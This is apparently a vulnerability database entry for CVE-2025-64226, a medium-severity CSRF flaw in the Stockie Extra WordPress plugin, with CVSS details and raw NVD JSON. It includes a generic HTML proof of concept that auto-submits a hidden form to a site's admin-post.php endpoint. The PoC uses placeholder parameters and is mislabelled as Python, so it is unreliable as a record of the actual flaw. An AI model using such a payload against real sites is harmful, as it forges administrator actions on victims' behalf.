Security Vulnerability Report
中文
CVE-2025-64226 CVSS 4.3 MEDIUM

CVE-2025-64226

Published: 2025-10-29 09:15:44
Last Modified: 2026-04-27 16:16:36

Description

Cross-Site Request Forgery (CSRF) vulnerability in colabrio Stockie Extra stockie-extra allows Cross Site Request Forgery.This issue affects Stockie Extra: from n/a through <= 1.2.11.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Stockie Extra <= 1.2.11

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CSRF PoC for CVE-2025-64226 - Stockie Extra Plugin --> <!-- This PoC demonstrates a CSRF attack that could trigger plugin functions --> <!DOCTYPE html> <html> <head> <title>CSRF PoC - Stockie Extra</title> </head> <body> <h2>CVE-2025-64226 CSRF PoC</h2> <p>This PoC demonstrates the CSRF vulnerability in Stockie Extra plugin.</p> <!-- Example: Auto-submitting form to trigger plugin action --> <form id="csrfForm" action="https://target-site.com/wp-admin/admin-post.php" method="POST" style="display:none;"> <!-- Replace with actual vulnerable parameter --> <input type="hidden" name="action" value="stockie_extra_action"> <input type="hidden" name="setting" value="malicious_value"> <input type="hidden" name="nonce" value=""> </form> <script> // Auto-submit form when page loads document.getElementById('csrfForm').submit(); // Alternative: Use fetch API for AJAX-based CSRF /* fetch('https://target-site.com/wp-admin/admin-ajax.php', { method: 'POST', credentials: 'include', headers: { 'Content-Type': 'application/x-www-form-urlencoded', }, body: 'action=stockie_extra_action&setting=malicious_value' }); */ </script> <p>If you see this message, the CSRF attack has been attempted.</p> </body> </html> <!-- Mitigation: Add CSRF tokens to all state-changing operations --> <!-- Implement: wp_verify_nonce() or check_ajax_referer() -->

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-64226", "sourceIdentifier": "[email protected]", "published": "2025-10-29T09:15:43.567", "lastModified": "2026-04-27T16:16:35.660", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Cross-Site Request Forgery (CSRF) vulnerability in colabrio Stockie Extra stockie-extra allows Cross Site Request Forgery.This issue affects Stockie Extra: from n/a through <= 1.2.11."}, {"lang": "es", "value": "Vulnerabilidad de falsificación de petición en sitios cruzados (CSRF) en colabrio Stockie Extra stockie-extra permite la falsificación de petición en sitios cruzados. Este problema afecta a Stockie Extra: desde n/a hasta menor igual que 1.2.11."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/stockie-extra/vulnerability/wordpress-stockie-extra-plugin-1-2-11-cross-site-request-forgery-csrf-vulnerability?_s_id=cve", "source": "[email protected]"}]}}